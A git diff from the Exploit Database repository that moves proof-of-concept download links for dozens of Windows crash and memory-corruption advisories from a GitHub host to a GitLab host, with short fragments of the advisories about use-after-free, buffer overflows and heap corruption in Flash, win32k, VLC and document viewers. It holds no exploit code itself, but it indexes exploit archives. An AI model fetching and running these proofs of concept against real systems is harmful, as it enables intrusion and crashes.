Flags # So looks like an exploitable use after free vulnerability. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/38736.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38736.zip \ No newline at end of file diff --git a/exploits/windows/dos/38761.py b/exploits/windows/dos/38761.py index 485925e58..4c607c51b 100755 --- a/exploits/windows/dos/38761.py +++ b/exploits/windows/dos/38761.py @@ -18,4 +18,4 @@ file.write(buffer) file.close() -# Follow on twitter @vik.create +# Follow on twitter @vik.create \ No newline at end of file diff --git a/exploits/windows/dos/38787.txt b/exploits/windows/dos/38787.txt index bc7893168..e3b63a862 100644 --- a/exploits/windows/dos/38787.txt +++ b/exploits/windows/dos/38787.txt @@ -62,6 +62,6 @@ Successful exploitation of the vulnerabilities may allow execution of arbitrary =========== http://protekresearchlab.com/exploits/COSIG-2015-001.pdf -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/38787.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38787.zip ############################################################################### \ No newline at end of file diff --git a/exploits/windows/dos/38788.txt b/exploits/windows/dos/38788.txt index bbddbcfb0..fa3522de8 100644 --- a/exploits/windows/dos/38788.txt +++ b/exploits/windows/dos/38788.txt @@ -58,6 +58,6 @@ Successful exploitation of the vulnerabilities may allow execution of arbitrary =========== http://protekresearchlab.com/exploits/COSIG-2015-002.pdf -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/38788.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38788.zip ############################################################################### \ No newline at end of file diff --git a/exploits/windows/dos/38789.txt b/exploits/windows/dos/38789.txt index 1ee393411..6954ab146 100644 --- a/exploits/windows/dos/38789.txt +++ b/exploits/windows/dos/38789.txt @@ -58,6 +58,6 @@ Successful exploitation of the vulnerabilities may allow execution of arbitrary =========== http://protekresearchlab.com/exploits/COSIG-2015-003.pdf -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/38789.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38789.zip ############################################################################### \ No newline at end of file diff --git a/exploits/windows/dos/38793.txt b/exploits/windows/dos/38793.txt index 32cd3362b..3f248bafa 100644 --- a/exploits/windows/dos/38793.txt +++ b/exploits/windows/dos/38793.txt @@ -4,4 +4,4 @@ The attached testcase crashes Windows 7 32-bit due to a pool buffer overflow in --- Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/38793.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38793.zip \ No newline at end of file diff --git a/exploits/windows/dos/38794.txt b/exploits/windows/dos/38794.txt index 22b3ef781..57b8501cc 100644 --- a/exploits/windows/dos/38794.txt +++ b/exploits/windows/dos/38794.txt @@ -6,4 +6,4 @@ When reproducing this issue in VMWare, it is necessary to remove VMWare tools. I --- Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/38794.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38794.zip \ No newline at end of file diff --git a/exploits/windows/dos/38795.txt b/exploits/windows/dos/38795.txt index 165dd4e51..9e79a5624 100644 --- a/exploits/windows/dos/38795.txt +++ b/exploits/windows/dos/38795.txt @@ -5,4 +5,4 @@ The attached testcase crashes Window 7 32-bit with Special Pool enabled on win32 Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/38795.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38795.zip \ No newline at end of file diff --git a/exploits/windows/dos/38796.txt b/exploits/windows/dos/38796.txt index 816746020..238714fd5 100644 --- a/exploits/windows/dos/38796.txt +++ b/exploits/windows/dos/38796.txt @@ -4,4 +4,4 @@ The attached testcase triggers a use-after-free condition in win32k. The attache --- Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/38796.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38796.zip \ No newline at end of file diff --git a/exploits/windows/dos/38858.txt b/exploits/windows/dos/38858.txt index 52fb03c6a..964223d20 100644 --- a/exploits/windows/dos/38858.txt +++ b/exploits/windows/dos/38858.txt @@ -46,4 +46,4 @@ When a malformed executable with an invalid integer (-1) in the “SizeOfRawData =========== 4) POC -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/38858.exe \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38858.exe \ No newline at end of file diff --git a/exploits/windows/dos/38934.txt b/exploits/windows/dos/38934.txt index 0522a9746..748186985 100644 --- a/exploits/windows/dos/38934.txt +++ b/exploits/windows/dos/38934.txt @@ -5,4 +5,4 @@ If the numFonts field in the TTC header is greater than (SIZE_MAX+1) / 4, an int The TTC file format is described here https://www.microsoft.com/typography/otspec/otff.htm Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/38934.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38934.zip \ No newline at end of file diff --git a/exploits/windows/dos/39019.txt b/exploits/windows/dos/39019.txt index a35073b5b..14633399d 100644 --- a/exploits/windows/dos/39019.txt +++ b/exploits/windows/dos/39019.txt @@ -44,4 +44,4 @@ my_text3.setTextFormat(my_format); A sample fla and swf are attached. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39019.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39019.zip \ No newline at end of file diff --git a/exploits/windows/dos/39020.txt b/exploits/windows/dos/39020.txt index ef698a42b..c7fda71fd 100644 --- a/exploits/windows/dos/39020.txt +++ b/exploits/windows/dos/39020.txt @@ -45,4 +45,4 @@ A sample swf and fla are attached. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39020.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39020.zip \ No newline at end of file diff --git a/exploits/windows/dos/39021.txt b/exploits/windows/dos/39021.txt index f3bfb56b5..65b4b3001 100644 --- a/exploits/windows/dos/39021.txt +++ b/exploits/windows/dos/39021.txt @@ -17,4 +17,4 @@ A sample swf and fla are attached. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39021.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39021.zip \ No newline at end of file diff --git a/exploits/windows/dos/39022.txt b/exploits/windows/dos/39022.txt index e642929aa..22dfb321c 100644 --- a/exploits/windows/dos/39022.txt +++ b/exploits/windows/dos/39022.txt @@ -43,4 +43,4 @@ A sample swf and fla is attached. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39022.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39022.zip \ No newline at end of file diff --git a/exploits/windows/dos/39025.txt b/exploits/windows/dos/39025.txt index eca7d9add..e0abe3ba8 100644 --- a/exploits/windows/dos/39025.txt +++ b/exploits/windows/dos/39025.txt @@ -5,4 +5,4 @@ The attached PoC triggers a null pointer vulnerability in OffsetChildren on Wind Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39025.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39025.zip \ No newline at end of file diff --git a/exploits/windows/dos/39040.txt b/exploits/windows/dos/39040.txt index 8153ce227..49650b635 100644 --- a/exploits/windows/dos/39040.txt +++ b/exploits/windows/dos/39040.txt @@ -21,4 +21,4 @@ function func(){ Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39040.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39040.zip \ No newline at end of file diff --git a/exploits/windows/dos/39041.txt b/exploits/windows/dos/39041.txt index 585cf8eab..e4c480baf 100644 --- a/exploits/windows/dos/39041.txt +++ b/exploits/windows/dos/39041.txt @@ -22,4 +22,4 @@ A sample fla and swf are attached. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39041.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39041.zip \ No newline at end of file diff --git a/exploits/windows/dos/39042.txt b/exploits/windows/dos/39042.txt index cdd81215d..361ee9b9c 100644 --- a/exploits/windows/dos/39042.txt +++ b/exploits/windows/dos/39042.txt @@ -26,4 +26,4 @@ A sample swf and fla are attached. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39042.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39042.zip \ No newline at end of file diff --git a/exploits/windows/dos/39044.txt b/exploits/windows/dos/39044.txt index f7d956d6c..80690b43a 100644 --- a/exploits/windows/dos/39044.txt +++ b/exploits/windows/dos/39044.txt @@ -28,4 +28,4 @@ A sample swf and fla are attached. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39044.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39044.zip \ No newline at end of file diff --git a/exploits/windows/dos/39045.txt b/exploits/windows/dos/39045.txt index 0e8deb647..5c5fddb05 100644 --- a/exploits/windows/dos/39045.txt +++ b/exploits/windows/dos/39045.txt @@ -28,4 +28,4 @@ A sample swf and fla are attached. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39045.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39045.zip \ No newline at end of file diff --git a/exploits/windows/dos/39046.txt b/exploits/windows/dos/39046.txt index 8be5593aa..515213e64 100644 --- a/exploits/windows/dos/39046.txt +++ b/exploits/windows/dos/39046.txt @@ -30,4 +30,4 @@ A sample swf and fla are attached. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39046.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39046.zip \ No newline at end of file diff --git a/exploits/windows/dos/39047.txt b/exploits/windows/dos/39047.txt index 733ea4c76..86b4f9abd 100644 --- a/exploits/windows/dos/39047.txt +++ b/exploits/windows/dos/39047.txt @@ -22,4 +22,4 @@ A sample swf and fla are attached. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39047.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39047.zip \ No newline at end of file diff --git a/exploits/windows/dos/39048.txt b/exploits/windows/dos/39048.txt index 0b51630d6..56d7fa456 100644 --- a/exploits/windows/dos/39048.txt +++ b/exploits/windows/dos/39048.txt @@ -23,4 +23,4 @@ A sample swf and fla are attached. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39048.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39048.zip \ No newline at end of file diff --git a/exploits/windows/dos/39049.txt b/exploits/windows/dos/39049.txt index 0b4e388f7..9b86058e1 100644 --- a/exploits/windows/dos/39049.txt +++ b/exploits/windows/dos/39049.txt @@ -29,4 +29,4 @@ A sample fla and swf are attached. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39049.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39049.zip \ No newline at end of file diff --git a/exploits/windows/dos/39050.txt b/exploits/windows/dos/39050.txt index fc37e163a..0cd6989d9 100644 --- a/exploits/windows/dos/39050.txt +++ b/exploits/windows/dos/39050.txt @@ -20,4 +20,4 @@ A sample swf and fla are attached. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39050.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39050.zip \ No newline at end of file diff --git a/exploits/windows/dos/39051.txt b/exploits/windows/dos/39051.txt index 6c960c6b4..15d25c650 100644 --- a/exploits/windows/dos/39051.txt +++ b/exploits/windows/dos/39051.txt @@ -20,4 +20,4 @@ A sample swf and fla are attached. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39051.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39051.zip \ No newline at end of file diff --git a/exploits/windows/dos/39052.txt b/exploits/windows/dos/39052.txt index 3ebc1ace1..93299b37a 100644 --- a/exploits/windows/dos/39052.txt +++ b/exploits/windows/dos/39052.txt @@ -20,4 +20,4 @@ A sample swf and fla are attached. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39052.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39052.zip \ No newline at end of file diff --git a/exploits/windows/dos/39053.txt b/exploits/windows/dos/39053.txt index 761464fa2..0806c367f 100644 --- a/exploits/windows/dos/39053.txt +++ b/exploits/windows/dos/39053.txt @@ -20,4 +20,4 @@ A sample swf and fla are attached. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39053.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39053.zip \ No newline at end of file diff --git a/exploits/windows/dos/39054.txt b/exploits/windows/dos/39054.txt index a7b749ed1..81027751a 100644 --- a/exploits/windows/dos/39054.txt +++ b/exploits/windows/dos/39054.txt @@ -25,4 +25,4 @@ A sample swf and fla are attached. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39054.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39054.zip \ No newline at end of file diff --git a/exploits/windows/dos/39055.txt b/exploits/windows/dos/39055.txt index 0a5d62c77..8f6e5a6b1 100644 --- a/exploits/windows/dos/39055.txt +++ b/exploits/windows/dos/39055.txt @@ -20,4 +20,4 @@ A sample swf and fla are attached. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39055.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39055.zip \ No newline at end of file diff --git a/exploits/windows/dos/39056.txt b/exploits/windows/dos/39056.txt index 290b33f77..d961db298 100644 --- a/exploits/windows/dos/39056.txt +++ b/exploits/windows/dos/39056.txt @@ -23,4 +23,4 @@ A sample swf and fla are attached. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39056.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39056.zip \ No newline at end of file diff --git a/exploits/windows/dos/39220.txt b/exploits/windows/dos/39220.txt index e4abf529e..324e63ef6 100644 --- a/exploits/windows/dos/39220.txt +++ b/exploits/windows/dos/39220.txt @@ -4,4 +4,4 @@ There is a use-after-free that appears to be related to rendering the display ba Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39220.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39220.zip \ No newline at end of file diff --git a/exploits/windows/dos/39232.txt b/exploits/windows/dos/39232.txt index f0a98f14e..1e63223f3 100644 --- a/exploits/windows/dos/39232.txt +++ b/exploits/windows/dos/39232.txt @@ -44,4 +44,4 @@ The DeviceMoniker::Load() method should limit the user supplied size to sane val Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39232.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39232.zip \ No newline at end of file diff --git a/exploits/windows/dos/39233.txt b/exploits/windows/dos/39233.txt index c50763b05..9425165ff 100644 --- a/exploits/windows/dos/39233.txt +++ b/exploits/windows/dos/39233.txt @@ -46,4 +46,4 @@ This DLL load can be triggered without user interaction with the following RTF d Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39233.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39233.zip \ No newline at end of file diff --git a/exploits/windows/dos/39275.txt b/exploits/windows/dos/39275.txt index 650ba48e7..32c9ff9ef 100644 --- a/exploits/windows/dos/39275.txt +++ b/exploits/windows/dos/39275.txt @@ -49,6 +49,6 @@ POC: ========== https://smsecurity.net/pdf-xchange-viewer-shading-type-7-heap-memory-corruption/ -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39275.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39275.zip ######################################################################################## \ No newline at end of file diff --git a/exploits/windows/dos/39330.txt b/exploits/windows/dos/39330.txt index 4f8cf1035..ae94ec25d 100644 --- a/exploits/windows/dos/39330.txt +++ b/exploits/windows/dos/39330.txt @@ -61,6 +61,6 @@ to execute arbitrary code under the context of the current process. =========== http://protekresearchlab.com/exploits/COSIG-2016-02.pdf -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39330.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39330.zip ############################################################################### \ No newline at end of file diff --git a/exploits/windows/dos/39353.txt b/exploits/windows/dos/39353.txt index 002795f38..77feff90b 100644 --- a/exploits/windows/dos/39353.txt +++ b/exploits/windows/dos/39353.txt @@ -59,6 +59,6 @@ An heap memory corruption occured when VLC parsed an malformed MPEG-4 file that =========== http://protekresearchlab.com/exploits/COSIG-2016-03.mp4 -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39353.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39353.zip ############################################################################### \ No newline at end of file diff --git a/exploits/windows/dos/39393.txt b/exploits/windows/dos/39393.txt index 96ac32ca5..a96cfc404 100644 --- a/exploits/windows/dos/39393.txt +++ b/exploits/windows/dos/39393.txt @@ -54,7 +54,7 @@ Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5302.php thricer.dqp project PoC: Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39393.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39393.zip ------------------------ diff --git a/exploits/windows/dos/39395.txt b/exploits/windows/dos/39395.txt index f421104ed..41c095164 100644 --- a/exploits/windows/dos/39395.txt +++ b/exploits/windows/dos/39395.txt @@ -66,6 +66,6 @@ on vulnerable installations of WPS. User interaction is required to exploit this =========== http://protekresearchlab.com/exploits/COSIG-2016-04.ppt -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39395.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39395.zip ############################################################################### \ No newline at end of file diff --git a/exploits/windows/dos/39396.txt b/exploits/windows/dos/39396.txt index 8ffb7cf85..03bb1bdd8 100644 --- a/exploits/windows/dos/39396.txt +++ b/exploits/windows/dos/39396.txt @@ -68,6 +68,6 @@ data section causing a stackbase memory corruption. =========== http://protekresearchlab.com/exploits/COSIG-2016-05.doc -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39396.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39396.zip ############################################################################### \ No newline at end of file diff --git a/exploits/windows/dos/39397.txt b/exploits/windows/dos/39397.txt index 5206a3011..9ffeeb0e6 100644 --- a/exploits/windows/dos/39397.txt +++ b/exploits/windows/dos/39397.txt @@ -66,6 +66,6 @@ By providing a malformed .ppt file, an attacker can cause an memory corruption b =========== http://protekresearchlab.com/exploits/COSIG-2016-06.ppt -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39397.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39397.zip ############################################################################### \ No newline at end of file diff --git a/exploits/windows/dos/39398.txt b/exploits/windows/dos/39398.txt index d4b60cb84..37c2c7da2 100644 --- a/exploits/windows/dos/39398.txt +++ b/exploits/windows/dos/39398.txt @@ -65,6 +65,6 @@ An attacker could leverage this to execute arbitrary code under the context of t =========== http://protekresearchlab.com/exploits/COSIG-2016-07.xlsx -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39398.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39398.zip ############################################################################### \ No newline at end of file diff --git a/exploits/windows/dos/39403.py b/exploits/windows/dos/39403.py index 7ca61b1c0..f05ff1c39 100755 --- a/exploits/windows/dos/39403.py +++ b/exploits/windows/dos/39403.py @@ -86,5 +86,5 @@ print "File exploit.app created!\n" # # PoC: http://www.zeroscience.mk/codes/bvas-5303.app.zip -# https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39403.zip +# https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39403.zip # \ No newline at end of file diff --git a/exploits/windows/dos/39428.txt b/exploits/windows/dos/39428.txt index 31a9a145a..47b28b8c7 100644 --- a/exploits/windows/dos/39428.txt +++ b/exploits/windows/dos/39428.txt @@ -26,4 +26,4 @@ POTPLAYER has buffer overflow in png parser of image of MP3 offset 5B . Crash is because of '\x22' at offset 5B Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39428.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39428.zip \ No newline at end of file diff --git a/exploits/windows/dos/39429.txt b/exploits/windows/dos/39429.txt index 4efd68f36..ab660993b 100644 --- a/exploits/windows/dos/39429.txt +++ b/exploits/windows/dos/39429.txt @@ -64,7 +64,7 @@ This vulnerability allows remote attackers to execute arbitrary code on vulnerab http://protekresearchlab.com/exploits/COSIG-2016-08-1.png http://protekresearchlab.com/exploits/COSIG-2016-08-2.png -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39429.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39429.zip ############################################################################### \ No newline at end of file diff --git a/exploits/windows/dos/39430.txt b/exploits/windows/dos/39430.txt index 07c39b784..c57c77463 100644 --- a/exploits/windows/dos/39430.txt +++ b/exploits/windows/dos/39430.txt @@ -64,6 +64,6 @@ This vulnerability allows remote attackers to execute arbitrary code on vulnerab http://protekresearchlab.com/exploits/COSIG-2016-09-1.png http://protekresearchlab.com/exploits/COSIG-2016-09-2.png -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39430.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39430.zip ############################################################################### \ No newline at end of file diff --git a/exploits/windows/dos/39431.txt b/exploits/windows/dos/39431.txt index 46e03cbb1..6c5f88783 100644 --- a/exploits/windows/dos/39431.txt +++ b/exploits/windows/dos/39431.txt @@ -61,6 +61,6 @@ This vulnerability allows remote attackers to execute arbitrary code on vulnerab http://protekresearchlab.com/exploits/COSIG-2016-10.iff -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39431.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39431.zip ############################################################################### \ No newline at end of file diff --git a/exploits/windows/dos/39444.txt b/exploits/windows/dos/39444.txt index 2a24dc4f0..e2dc30af9 100644 --- a/exploits/windows/dos/39444.txt +++ b/exploits/windows/dos/39444.txt @@ -23,4 +23,4 @@ Alternate Pic Viewer crashes on a faulty PGM image file . Faulty PGM file is attached as POC Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/ \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/ \ No newline at end of file diff --git a/exploits/windows/dos/39509.txt b/exploits/windows/dos/39509.txt index cfc34c092..b3418eab2 100644 --- a/exploits/windows/dos/39509.txt +++ b/exploits/windows/dos/39509.txt @@ -57,4 +57,4 @@ Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5309.php PoC: http://zeroscience.mk/codes/poc5309.pm4.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39509.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39509.zip \ No newline at end of file diff --git a/exploits/windows/dos/39512.txt b/exploits/windows/dos/39512.txt index 6b4afe793..4f8dceb6c 100644 --- a/exploits/windows/dos/39512.txt +++ b/exploits/windows/dos/39512.txt @@ -12,4 +12,4 @@ Multiple Access violations POC: https://www.dropbox.com/s/rtakkmw9ru55lbn/CALENDARLib.zip?dl=0 -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39512.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39512.zip \ No newline at end of file diff --git a/exploits/windows/dos/39518.txt b/exploits/windows/dos/39518.txt index 0864623a9..c4f51dab3 100644 --- a/exploits/windows/dos/39518.txt +++ b/exploits/windows/dos/39518.txt @@ -12,4 +12,4 @@ Negative height and width values cause a program crash (memory corruption) and S Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39518.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39518.zip \ No newline at end of file diff --git a/exploits/windows/dos/39530.txt b/exploits/windows/dos/39530.txt index e9ff54b0f..6f6ed768f 100644 --- a/exploits/windows/dos/39530.txt +++ b/exploits/windows/dos/39530.txt @@ -121,4 +121,4 @@ This looks like broken authenticode parsing to me. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39530.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39530.zip \ No newline at end of file diff --git a/exploits/windows/dos/39533.txt b/exploits/windows/dos/39533.txt index 7c4db386f..96e55f31d 100644 --- a/exploits/windows/dos/39533.txt +++ b/exploits/windows/dos/39533.txt @@ -46,6 +46,6 @@ Technical details: POC: ========== https://plmsecurity.net/sites/plmsecurity.net/files/APSB16-06_PoC.pdf -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39533.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39533.zip ######################################################################################## \ No newline at end of file diff --git a/exploits/windows/dos/39546.txt b/exploits/windows/dos/39546.txt index 3f3c40214..23aa8f283 100644 --- a/exploits/windows/dos/39546.txt +++ b/exploits/windows/dos/39546.txt @@ -66,6 +66,6 @@ by pointing to an uninitialized space of memory.An attacker can leverage this vu =========== http://protekresearchlab.com/exploits/COSIG-2016-13.pdf -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39546.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39546.zip ############################################################################### \ No newline at end of file diff --git a/exploits/windows/dos/39560.txt b/exploits/windows/dos/39560.txt index 0d423a153..aa0514146 100644 --- a/exploits/windows/dos/39560.txt +++ b/exploits/windows/dos/39560.txt @@ -74,4 +74,4 @@ Attached is an archive with the proof-of-concept mutated OTF file, together with Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39560.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39560.zip \ No newline at end of file diff --git a/exploits/windows/dos/39561.txt b/exploits/windows/dos/39561.txt index 8e4d14c43..a75dd122f 100644 --- a/exploits/windows/dos/39561.txt +++ b/exploits/windows/dos/39561.txt @@ -61,4 +61,4 @@ Attached is an archive with the proof-of-concept mutated OTF file, together with Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39561.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39561.zip \ No newline at end of file diff --git a/exploits/windows/dos/39600.txt b/exploits/windows/dos/39600.txt index 8b3a3f2db..0b76eedd2 100644 --- a/exploits/windows/dos/39600.txt +++ b/exploits/windows/dos/39600.txt @@ -56,4 +56,4 @@ Without page heap, you should get heap corruption, probably writing to 0x4141414 Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39600.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39600.zip \ No newline at end of file diff --git a/exploits/windows/dos/39601.txt b/exploits/windows/dos/39601.txt index a9b6a2685..db01a9eee 100644 --- a/exploits/windows/dos/39601.txt +++ b/exploits/windows/dos/39601.txt @@ -12,4 +12,4 @@ The attached testcase will attempt to free() an invalid pointer to demonstrate t Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39601.zip \ No newline at end of file 